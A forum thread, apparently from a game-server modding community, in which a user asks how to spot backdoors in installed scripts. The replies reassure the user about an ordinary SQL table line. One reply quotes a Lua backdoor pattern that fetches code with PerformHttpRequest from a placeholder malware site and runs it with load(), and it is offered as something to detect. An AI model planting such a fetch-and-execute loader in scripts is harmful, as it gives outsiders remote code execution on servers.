[QUESTION] How to spot a potential backdoor? (2 Viewers)

songbirdmusic_19573 · Jul 18, 2024

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

VeryNiceIndeed · Jul 18, 2024

songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

That line is perfectly fine for a database

coolcsgo · Jul 18, 2024

This is just setting the auto increment, and default charset for the DB you imported

songbirdmusic_19573 · Jul 19, 2024

Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked

Hopatchke · Aug 29, 2024

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)

things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker

songbirdmusic_19573 · Aug 29, 2024

Hopatchke said:
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)

things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

Hopatchke · Aug 29, 2024

songbirdmusic_19573 said:
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

malwarebytes , the free version offers a good scan

, works perfectly!

songbirdmusic_19573 · Aug 30, 2024

Hopatchke said:
malwarebytes , the free version offers a good scan , works perfectly!

I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to

airis13370 · Sep 1, 2024

grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh

amirexit · Sep 3, 2024

songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

i need to know too thanks for creating this thread

Du22121 · Sep 9, 2024

you never know if they add back doors when its too late

songbirdmusic_19573 · Sep 20, 2024

Du22121 said:
you never know if they add back doors when its too late

Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for

Malagah · Sep 22, 2024

songbirdmusic_19573 said:
Ce n'est pas forcément vrai, il existe des vérificateurs de scripts et vous pouvez les analyser pour plus de sécurité. J'analyse toujours mes scripts, puis je recherche manuellement tout mon code et je le soumets à une autre analyse pour être sûr. Il existe des mesures de prévention et des moyens de se protéger, il faut savoir quoi rechercher

It would be cool to create a topic to explain how to do it and which tool to use

khaosen · Sep 22, 2024

songbirdmusic_19573 said:
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

if you want to detect backdoors look for performhttp inside scripts

Search

[QUESTION] How to spot a potential backdoor? (2 Viewers)

songbirdmusic_19573

Active member

VeryNiceIndeed

Active member

coolcsgo

Member

songbirdmusic_19573

Active member

Hopatchke

Active member

songbirdmusic_19573

Active member

Hopatchke

Active member

songbirdmusic_19573

Active member

airis13370

New member

amirexit

Well-known member

Du22121

Member

songbirdmusic_19573

Active member

Malagah

Member

khaosen

Active member

Users who are viewing this thread